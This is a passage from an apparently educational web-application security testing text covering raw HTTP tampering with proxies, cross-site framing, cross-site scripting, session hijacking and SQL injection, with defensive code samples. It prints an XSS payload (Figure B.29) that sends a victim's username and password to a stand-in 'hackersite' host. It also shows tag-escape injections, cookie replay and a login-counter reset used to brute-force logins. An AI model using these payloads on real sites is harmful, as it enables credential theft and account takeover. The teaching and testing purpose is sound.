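    """Send the raw request and return the raw response (headers and body)."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_request(host, path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)
```

For example, send_request("127.0.0.1", 80, "/test2.asp") would return the complete response, status line and headers included, ready for inspection.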
When nothing but manual tampering will do, nothing beats using a local proxy. Local proxies can be garnered from many sources, but they all basically do the same thing: let you view and modify raw HTTP packets. The real differentiators are in details such as the ability to chain through a network proxy, the ability to use SSL, and the ability to modify response packets in addition to request packets. Most have extremely functional interfaces as well, combining all packets and matching responses to their requests. They work by simply accepting the packet from your browser, displaying the packet to you for modification, then forwarding it to the server and displaying the server response.
By letting the browser make the request for you, all you have to do is modify the area you're interested in. This is extremely efficient in complex applications that can change key areas with each request; now your browser does all the heavy lifting, leaving you free to tweak where desired. Some proxies will even allow you to search and replace packet contents automatically.
Figure B.14 shows SPI Proxy configured to automatically remove all Cookie and Referer headers and to modify the User-Agent header. Being able to modify the raw packet automatically is a great benefit. One application we played with had a "maximum login attempts" counter in its cookies; by configuring the filters in the proxy, we automatically reset the counter to the maximum with each request and were able to pound the login fields all we wanted. Of course, just maintaining that count in the client is an issue unto itself.
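The kind of automatic rewriting described here can be approximated in a few lines. The following is a simplified sketch, not SPI Proxy's actual implementation; the function name and its parameters are hypothetical. It drops named headers and replaces others before a request is forwarded.

```python
def apply_filters(raw_request: str, drop=("cookie", "referer"), replace=None) -> str:
    """Remove or rewrite headers in a raw HTTP request string."""
    replace = replace or {}
    # Split the header section from the body at the first blank line.
    head, sep, body = raw_request.partition("\r\n\r\n")
    request_line, *headers = head.split("\r\n")

    kept = []
    for header in headers:
        name, _, _value = header.partition(":")
        key = name.strip().lower()
        if key in drop:
            continue  # filtered out entirely
        if key in replace:
            header = f"{name}: {replace[key]}"  # value swapped in place
        kept.append(header)

    return "\r\n".join([request_line, *kept]) + sep + body
```

Calling apply_filters(request, replace={"user-agent": "TestAgent"}) strips the Cookie and Referer headers and substitutes the User-Agent value, leaving the rest of the request untouched.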
Once you have the ability to actually modify packets, you're on your way to actively testing for logical vulnerabilities. Unfortunately, there's simply no way to give a full education on all the myriad possibilities that exist in exploiting application logic, for they are as diverse as the applications themselves. In the next section, however, we look at some basic examples of well-known vulnerabilities and exploits.
Code Vulnerabilities in Web Applications
The majority of really serious vulnerabilities in Web applications don't occur at the "content" level per se; they're based on exploiting failures in the logic of the server-side code. These are more difficult to discover because they require actually exercising the application in various ways to determine the behavior of the back-end code.
Client-Side Attacks
When you visit a Web page, the main HTML file comes from that server but can reference elements that are spread across the Internet. Advertisements, streaming media, images, and other objects are often hosted aside via caching services that reduce the total bandwidth consumed by the main site. Browsers know to load these within the main page, even though their source is offsite. This behavior, although required for the Web to work properly, can expose the browser to many different attacks known as client-side attacks.
Client-side attacks can occur in many forms; drive-by ActiveX downloads are one example, as is a malicious Java applet on a Web site. These are all attacks from the Web site itself; the owner of the site is attacking the hapless users of it. Rarely will the owners of these systems engage a penetration tester or auditor! There are, however, plenty of legitimate Web sites that have vulnerabilities that allow a malicious third party to use the sites to attack browsers. Instead of trying to break into an application head-on to get inside and steal sensitive information, the attacks target the users of that application to gain access to information.
Client-side attacks are often carried out through some sort of phishing scam: sending out extremely convincing-looking e-mails that try to attract people to a mock Web site that mimics a well-known real site and then get them to enter their private information into the mock Web site. These scammers typically employ a variety of URL obfuscation techniques to hide their true identity. This type of attack requires no vulnerability on the actual Web application; rather, it is sheer deception. The weakness in this type of attack is that a sharp consumer might take notice of the suspicious URL, recognizing that it doesn't belong to the real organization.
Recently, a bank's customers were being phished with a different type of attack that took advantage of a vulnerability in the real bank's Web application, one called cross-site framing. In this case, the phishing attack didn't need to employ a mock Web site; instead it sent the victims to the real bank Web site, a trusted domain. The phishers exploited a page that intentionally displayed third-party content. The location of the content to be displayed in the frame was specified in the URL, as demonstrated in Figure B.15. There are ways to do this safely by examining the location specified within the server-side code to ensure that the URL passed to the page is legitimate, but in this case the needed validation wasn't performed and the page would load into the frame any content that was specified in the URL. The phishers then created a mock login form on another site and specified the location of that form in the URL, as demonstrated in Figure B.16. Now the phishers' Web site was framed within the original site.
By phishing that URL around through legitimate-looking e-mails, the scammers then attempted to dupe the bank's actual customers into logging into their form. Figure B.17 shows the modified URL that can now be used in the phish bait. Note that the host and domain are those of the original site, so even a consumer who scrutinizes them still stands a chance of being fooled.
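The server-side validation that was missing in this case can be quite small. The sketch below shows one way it might look in Python; the allowlist contents and the function name are hypothetical, and a real application would load its list of approved hosts from configuration.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts whose content may be framed.
ALLOWED_FRAME_HOSTS = {"partner.example.com"}


def is_safe_frame_url(url: str) -> bool:
    """Accept only HTTPS URLs whose host is explicitly approved."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed URL: reject rather than guess
    # Compare the parsed hostname, not a substring of the raw URL, so that
    # tricks such as "https://partner.example.com@evil.example/" are rejected.
    return parts.scheme == "https" and parts.hostname in ALLOWED_FRAME_HOSTS
```

A page that frames third-party content would call is_safe_frame_url() on the querystring value and refuse to render the frame when it returns False.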
Figure B.17 HTTP Response That Suggests Susceptibility to Cross-Site Scripting
This classic example of a client-side attack demonstrates some key characteristics of such attacks:
■ They don't attack the site directly but rather indirectly through the users of the site.
■ They typically trick the main site into interacting with a third party by injecting some form of content.
■ They get to leverage the trust between the users and the main site, since the third-party interaction is done by the actual, real site and not a fake one.
This particular vulnerability is relatively rare, since few sites frame third-party sites and actually embed the full URLs into their queries. A much more commonly found vulnerability is cross-site scripting (abbreviated XSS). Cross-site scripting exists when the Web site accepts input that it shouldn't (as in the previous example) but then sends that input back to the browser. This could be in a login page, where the username is displayed back to the browser, or a search field, where the search terms are displayed, but it can actually exist anywhere.
For example, look at the request and response in Figure B.17. We see that the page cklogin.asp takes the value supplied for the Userid parameter and displays that value back in the page. This is the first test necessary to identify XSS: finding a place where input is echoed back as output. For this to be an actual XSS vulnerability, however, the page must accept and replay JavaScript without performing any validation on it.
The simplest way to test for this is to enter script into the parameter and see if it is echoed back to the browser. Figure B.18 shows a request packet being modified; the legitimate value for the parameter named userid is replaced with a simple JavaScript.
Figure B.18 also demonstrates encoding the parameters. When manipulating packets directly, you must remember that the content-length header has to be updated to reflect the new length of the post data string. It might also be necessary to encode the input. Web browsers do this for you automatically, and any packet editor you use should allow you to do this as well.
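Both bookkeeping steps, encoding the input and recomputing Content-Length, are easy to automate. The following is a minimal sketch, assuming a POST to cklogin.asp with a userid field as in the text; the host name, the script value, and the build_post helper are illustrative assumptions.

```python
from urllib.parse import urlencode


def build_post(path: str, host: str, fields: dict) -> bytes:
    """Build a raw form POST with an encoded body and a matching Content-Length."""
    # urlencode percent-encodes characters such as '<', '>' and '/'.
    body = urlencode(fields).encode("ascii")
    headers = [
        f"POST {path} HTTP/1.0",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        # Always derived from the final body, never copied from the old packet.
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body


request = build_post("/cklogin.asp", "localhost",
                     {"userid": "<script>alert(1)</script>"})
print(request.decode("ascii"))
```

Because the header is computed from the encoded body, changing the injected value never leaves a stale length behind.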
After you've injected the script into the request, simply analyze the response. If the script comes back in the response unmodified, that parameter is vulnerable to cross-site scripting. Figure B.19 shows the script returned in our example response. The application intends to write "Welcome Back [username]" but instead writes "Welcome Back [JavaScript]" since it believes the actual username is the JavaScript expression.
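The "comes back unmodified" check is a simple substring test. Here is a small sketch; the two sample responses are made up for illustration and stand in for what a vulnerable page and a properly encoding page might return.

```python
def is_reflected_unencoded(payload: str, response_body: str) -> bool:
    """True when the payload appears in the response exactly as it was sent."""
    return payload in response_body


payload = "<script>alert(1)</script>"

# Hypothetical responses: the first echoes input as-is, the second HTML-encodes it.
vulnerable_page = "<p>Welcome Back <script>alert(1)</script></p>"
encoded_page = "<p>Welcome Back &lt;script&gt;alert(1)&lt;/script&gt;</p>"

print(is_reflected_unencoded(payload, vulnerable_page))
print(is_reflected_unencoded(payload, encoded_page))
```

A match only shows that the input is replayed verbatim; as the next section explains, whether the script actually executes also depends on where in the page it lands.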
Escaping from Literal Expressions
If you can get a complete script returned in an HTTP response, the request parameter that was tested is vulnerable. Often, however, the script itself won't execute in the browser, because it was returned inside a literal statement. The server-side code returns the script, but it's in some element the browser only recognizes as HTML and not as script. For instance, in Figure B.20, we see our test script returned, but this time inside an image tag. To get this script to properly execute, we need to escape the tag.
Figure B.21 illustrates prefacing the injected script with the characters necessary to close the existing tag. This then separates the script from the tag, but the remainder of the tag is now "stranded" and will print on the screen as illustrated in Figure B.22. This, along with the "broken image" icon, certainly won't suffice in a proper hack; both must be cleaned up.
The first task is removing the "giant red X" (which indicates the existence of a broken image link) from the screen. Figure B.23 shows prefacing the injection not just with the "> combination necessary to escape the tag but now with a height and width specification that ensures the icon isn't shown at all. At the end of the injection, a metatag is opened. In the response we can see that we have successfully shrunk and closed the image, creating a nicely formed invisible tag. Figure B.24 shows the rendered results—which are, of course, completely blank now.
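The effect of escaping the tag is easiest to see by looking at the markup the server ends up emitting. The sketch below uses a hypothetical server-side template and hypothetical payloads (not the exact ones in the figures) to show the literal case and the cleaned-up escape side by side.

```python
def render_image_tag(user_value: str) -> str:
    """Hypothetical naive template: input is dropped straight into an attribute."""
    return f'<img src="/images/{user_value}.gif">'


# Returned inside the attribute, the script is just part of a broken image URL.
literal = render_image_tag("<script>alert(1)</script>")

# Closing the quote and the tag first lets the script stand on its own.
# The height/width hide the broken-image icon, and the trailing <meta
# swallows the stranded '.gif">' left over from the template.
escaped = render_image_tag(
    'x" height="0" width="0"><script>alert(1)</script><meta name="'
)

print(literal)
print(escaped)
```

The second result is a zero-size image, a free-standing script element, and a harmless meta tag, which matches the blank rendering the text describes.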
There are other ways of executing script as well. For instance, you can specify a remote script, as shown in Figure B.25, or instead embed the script into the image tag as shown in Figure B.26.
Once the injection is tested and confirmed, the actual attack needs to be formed. The JavaScript Document Object Model (DOM) provides several extremely useful capabilities to the developer and hacker alike. For instance, JavaScript provides access to field values and is often used by developers to ensure that required information has been entered into forms. This same functionality also lets the hacker access information entered into the form via a cross-site scripting attack, as demonstrated in Figures B.27 and B.28.
Figure B.27 The Injected Script
The next step is to get the information where it can be read. This is usually done by appending it to an image tag whose source is a remote Web server that the hacker has access to, as shown in Figure B.29. When the script is activated, the browser will attempt to load the image, making a call to the remote server with the stolen information in it. From there, the hacker simply has to read the Web logs for the stolen information. You can also use JavaScript to redirect windows and open new windows and create framesets, all of which could display forged login pages. Figures B.30 and B.31 show an example of appending the form values to a window.open command; this is an elaborate example of the various fun to be had with cross-site scripting.
Figure B.29 Passing Credentials to the Third-Party Site Via an Image Tag
userid=" onmouseover="document.write('<img height=0 width=0 src='http://hackersite/'+document.login.userid.value+'=='+document.login.password.value)">"&password=doh!nuts
Figure B.30 Appending Form Values to a window.open Command
Cross-site scripting made big waves a few years ago when it was discovered in several popular Web-based e-mail providers. XSS is still unfortunately a very common vulnerability in Web applications. Defensive coding techniques require strong validation of all input for script tags and certain terms, as well as HTML encoding any printed output that is directly received from the browser.
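The output-encoding half of that defense can be sketched with Python's standard html module. The welcome_banner function is a hypothetical stand-in for whatever server-side code writes the "Welcome Back" message; the point is only that encoding turns markup characters into harmless entities.

```python
import html


def welcome_banner(username: str) -> str:
    """Echo the username with HTML metacharacters encoded."""
    # quote=True also encodes quote characters, which matters when the
    # value is written inside an attribute rather than between tags.
    return f"Welcome Back {html.escape(username, quote=True)}"


print(welcome_banner("<script>alert(1)</script>"))
print(welcome_banner('x" onmouseover="alert(1)'))
```

The browser displays the encoded text literally instead of interpreting it, so the script is shown to the user rather than run.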
Remember that anything that occurs on that page and is accessible via JavaScript is subject to theft via cross-site scripting. If the vulnerability occurs on a page that requests a username and password, those credentials are subject to theft. However, even if the page doesn't have any actual sensitive forms on it, the cookie itself can often be a big help to the hacker, since most cookies contain session identifiers that can be used to impersonate another user.
Session Hijacking
HTTP is a stateless protocol, and Web applications have no automatic way of knowing what has happened from one page to the next. This functionality must be built into the application by the developer and is typically done through the use of a session identifier. A session ID is essentially a serial number that identifies an individual to the site; it is given by the system at a user's initial visit and is offered up to the server by the browser on each subsequent request. The system looks up all pertinent information related to that session ID, then makes appropriate decisions based on it, such as to allow access to a certain page or to display certain items in the online shopping cart.
Session IDs must be protected because they are essentially a form of identification. Just as someone who steals an employee badge could gain unauthorized access to a building, someone who steals a session ID can gain unauthorized access to a system. For this reason, we follow some basic rules on handling session identifiers:
■ They must be uniquely generated so that no two users are ever assigned the same ID.
■ They must be random enough that nobody can predict a future ID or determine someone else's ID.
■ They must be long enough to prevent the brute-force guessing of an ID in use.
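The three rules above can be met with a cryptographically secure random generator. The following is a minimal sketch using Python's secrets module; the function name and the 32-byte default are illustrative choices, not a requirement stated in the text.

```python
import secrets


def new_session_id(nbytes: int = 32) -> str:
    """Return a URL-safe session ID built from `nbytes` of secure randomness."""
    # 32 random bytes (256 bits) make collisions, prediction, and
    # brute-force guessing impractical.
    return secrets.token_urlsafe(nbytes)


first = new_session_id()
second = new_session_id()
print(first)
print(second)
```

Contrast this with a counter that increments for each user: it produces unique IDs but fails the second rule entirely, since every future ID is predictable.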
Session IDs are typically transmitted by cookies, though they're also commonly seen in post data (through hidden form fields) and queries. It really doesn't matter how or where they're stored, since they're all equally exposed in the packet. Usually a site will just use the session ID created by the server, but every once in a while developers create their own; these are most subject to abuse. Several large commercial Web sites have made headlines for failing to create unique and random session IDs. In some extreme cases, they actually just incremented the number up for each user, so that guessing someone else's ID was as simple as adding 1 to your own.
When session IDs aren't protected, they're subject to theft and reuse. Figure B.32 shows the result of logging into a popular free portal application. You can see that the server sets a new cookie reflecting the authenticated state.
Figure B.32 The Cookie Changes to Reflect the Authenticated State
POST /forum/login_user.asp?FID=0 HTTP/1.0
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: http://localhost/forum/login_user.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Connection: Close
Cookie: S00P=LTVST=38304%2E5169791667; ASPSESSIONIDASDSAASB=HLKJPIICENBMGFKJEMLHFNPJ

name=Ann+Nomenus&password=anni1&AutoLogin=true&NS=true&securityCode=218318&sessionID=680500324&CFM=&Submit=Forum+Login
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 13 Nov 2004 17:24:56 GMT
Server: CoffeeMachine Embeded HTTPd
X-Powered-By: Hobbits
pragma: no-cache
cache-control: private
Location: login_user_test.asp?CFM=
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Expires: Thu, 11 Nov 2004 17:24:56 GMT
Cache-control: No-Store
Set-Cookie: S00P=NS=0&UID=Ann+Nomenus87ZFAAZ5EE&LTVST=38304%2E5169791667; path=/; expires=Sun, 13-Nov-2005 17:24:56 GMT
If the user then logged off the application, the application would replace the cookie with something that reflected the unauthenticated state. However, many people simply close their browsers without actually logging off the application. This keeps the session open on the server and in the application until it times out.
The browser is closed and cookies are cleared. A new request is made for a restricted page, and as shown in Figure B.33, the server responds accordingly, since there is now nothing identifying the person as a valid user.
Figure B.33 Without the Cookie, No Valid Session Exists
However, by simply substituting the cookie that was set by the server during the authenticated state, we now get the authenticated page shown in Figure B.34. The server doesn't really know who is viewing the page; the hacker presented the correct credentials and is allowed through. By adding the session ID to the request, the hacker now has access to everything the legitimate user has access to on this application.
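A toy model makes the problem concrete. The sketch below is a deliberately simplified, hypothetical session store (not the portal application's real code): the server's only notion of identity is the ID presented with the request, so anyone who replays it is treated as the user until the session is destroyed.

```python
import secrets

# Hypothetical in-memory session store: session ID -> username.
sessions = {}


def login(username: str) -> str:
    """Create a session after a (not shown) successful password check."""
    session_id = secrets.token_hex(16)
    sessions[session_id] = username
    return session_id


def handle_request(session_cookie):
    """Serve the restricted page to whoever presents a live session ID."""
    user = sessions.get(session_cookie)
    if user is None:
        return "redirect to login"
    return f"restricted page for {user}"


def logout(session_id: str) -> None:
    """Destroy the session so a captured ID stops working."""
    sessions.pop(session_id, None)


stolen = login("Ann")                 # the victim logs in; the ID leaks
print(handle_request(None))           # no cookie: redirect to login
print(handle_request(stolen))         # replayed cookie: restricted page for Ann
logout(stolen)
print(handle_request(stolen))         # after logout: redirect to login
```

The last call shows why closing the browser without logging off matters: until logout() runs or the session times out, the captured ID keeps working.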
Figure B.34 The Cookie Contains All the Authentication Necessary
Cookies are also excellent sources of other information, and some developers have actually stored the user's ID and password in the cookie in plaintext! Cookies sent to a non-SSL site are easily stolen by sniffing, but even on an SSL site, cookies are easily stolen using a cross-site scripting attack. Session IDs that are predictable do not even require a stolen identifier; with enough analysis, the hacker can simply learn the algorithms used to create the identifiers and create their own identifiers.
Command Execution: SQL Injection
Input validation is a central concept in Web application security. Developers must scrutinize everything sent in the HTTP request to ensure that it is valid, expected input before using it. Entire papers, projects, and products exist to help with input validation. When developers don't validate the request, their applications can become extremely susceptible to tampering. The cross-site scripting vulnerability we explored earlier relies on an input validation fault: the fact that the JavaScript was accepted by the application in the first place.
There were other factors involved with the XSS attack as well—not only must the application accept the JavaScript, but it must also replay it back properly so that it executes. Finally, there's the social engineering aspect—phishing for the hapless client. Phishing scams are highly visible and have been going on for ages (think 419ers), but SQL injection is even more prevalent, though less publicized.
Command injection refers to being able to inject some sort of code into the Web application that executes. Just as cross-site scripting inserts scripts, a hacker can also try inserting shell commands, Web code, or even full database queries into a Web application.
Of all the possible command injections, the most common one by far is SQL injection. By inserting carefully crafted SQL queries into a vulnerable Web application, a hacker can actually get his or her own commands to run on the database. Some testing is required to find the vulnerable parameter and to determine the exact maneuvering required to get a query into a vulnerable Web application. Once that position is found, however, the hacker can immediately go about enumerating the database and then finally extracting data from it.
SQL injection exploits common methods of performing database queries that concatenate input into a text string. Look at the code snippet in Figure B.35 for selecting patient information based on a supplied search term.
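The concatenation pattern can be illustrated with a short, self-contained sketch. This is a hypothetical stand-in written in Python with an in-memory SQLite database, not the code from Figure B.35; the table, column names, and sample rows are assumptions made for the example.

```python
import sqlite3

# Hypothetical patient table in a throwaway in-memory database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE patients (name TEXT, diagnosis TEXT)")
conn.executemany("INSERT INTO patients VALUES (?, ?)",
                 [("Smith", "flu"), ("Jones", "sprain")])


def search_concatenated(term: str):
    """Vulnerable: the search term becomes part of the SQL text itself."""
    query = "SELECT name FROM patients WHERE name = '" + term + "'"
    return conn.execute(query).fetchall()


def search_parameterized(term: str):
    """Safer: the term is bound as data and never parsed as SQL."""
    return conn.execute("SELECT name FROM patients WHERE name = ?",
                        (term,)).fetchall()


injected = "x' OR '1'='1"
print(search_concatenated(injected))   # the OR clause matches every row
print(search_parameterized(injected))  # no patient has that literal name
```

With the concatenated query, the injected quote closes the string literal and the rest of the input is parsed as SQL; with the bound parameter, the same input is only ever compared as a name.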